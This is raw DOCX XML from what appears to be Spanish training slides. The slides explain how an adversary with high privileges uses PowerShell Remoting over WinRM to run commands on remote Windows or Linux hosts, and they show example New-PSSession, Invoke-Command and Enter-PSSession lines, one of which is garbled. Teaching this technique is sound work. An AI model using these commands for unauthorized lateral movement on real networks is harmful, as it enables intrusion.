        <w:spacing w:before="263"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026110E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1626"/>
        </w:tabs>
        <w:ind w:left="1626" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Utilizaba el protocolo WinRM y se ejecuta de forma predeterminada en los puertos TCP 5985 (HTTP) y 5986 (HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D116DF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50675D61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28762017" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1626"/>
        </w:tabs>
        <w:ind w:left="1626" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Es una forma recomendada de administrar los servidores principales de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B9E1A1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3411BE12" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="132"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B5978D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1626"/>
        </w:tabs>
        <w:ind w:left="1626" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Esto viene habilitado de forma predeterminada desde Windows Server 2012.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C83BBFC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64CFA27D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="177"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C997DA4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1627"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1627" w:right="1870"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>El adversario utiliza esta utilidad para conectarse a computadoras/servidores remotos y ejecutar comandos al lograr altos privilegios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7775A317" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="102"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FE9121" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1626"/>
        </w:tabs>
        <w:ind w:left="1626" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo : </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Invoke-Command</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PSSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enter-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PSSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F128EDC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1040" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FF48BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1104"/>
        </w:tabs>
        <w:spacing w:before="61" w:line="506" w:lineRule="exact"/>
        <w:ind w:left="1104"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>La configuración es fácil "</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enable-PSRemoting -SkipNetworkProfileCheck -Verbose -Force</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>" como</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D966B0D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="506" w:lineRule="exact"/>
        <w:ind w:left="1105"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E95BD3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="275"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7189E676" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1104"/>
        </w:tabs>
        <w:ind w:left="1104"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se utiliza para ejecutar comandos y scripts en:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B2F22" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="39"/>
        <w:ind w:left="1824" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Servidores/estaciones de trabajo de Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C0558" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="39"/>
        <w:ind w:left="1824" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Máquinas Linux también (PowerShell es un proyecto de código abierto)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D5BA37" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7055A120" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="213"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20133DF7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1104"/>
        </w:tabs>
        <w:ind w:left="1104"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Comandos de ejemplo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CF198" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460D04EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C82AE1E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="108"/>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699968" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="602BA881" wp14:editId="05EC54C1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2199132</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243929</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7793990" cy="1789430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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990" cy="1789430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1130F924" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="8"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="1324"/>
                              </w:tabs>
                              <w:spacing w:before="186"/>
                              <w:ind w:hanging="387"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>$session = new-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>pssession</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> –</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>computername</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> windows-server</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1ED2A7A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="19"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1275A541" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="8"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="639"/>
                              </w:tabs>
                              <w:ind w:left="639" w:hanging="391"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Invoke-Command –Session $session –ScriptBlock DWhoami; nombre de host}</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="46517951" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="22"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3EA7F5F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="8"/>
                              </w:numPr>
                              <w:tabs>
                                <w:tab w:val="left" w:pos="2624"/>
                              </w:tabs>
                              <w:ind w:left="2624" w:hanging="396"/>
                              <w:jc w:val="left"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>Enter-pssession –session $session -verbose</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="602BA881" id="Textbox 529" o:spid="_x0000_s1276" type="#_x0000_t202" style="position:absolute;margin-left:173.15pt;margin-top:19.2pt;width:613.7pt;height:140.9pt;z-index:-15616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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1130F924" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="8"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="1324"/>
                        </w:tabs>
                        <w:spacing w:before="186"/>
                        <w:ind w:hanging="387"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>$session = new-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>pssession</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> –</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>computername</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> windows-server</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1ED2A7A2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="19"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1275A541" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="8"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="639"/>
                        </w:tabs>
                        <w:ind w:left="639" w:hanging="391"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Invoke-Command –Session $session –ScriptBlock DWhoami; nombre de host}</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="46517951" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="22"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3EA7F5F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="8"/>
                        </w:numPr>
                        <w:tabs>
                          <w:tab w:val="left" w:pos="2624"/>
                        </w:tabs>
                        <w:ind w:left="2624" w:hanging="396"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>Enter-pssession –session $session -verbose</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
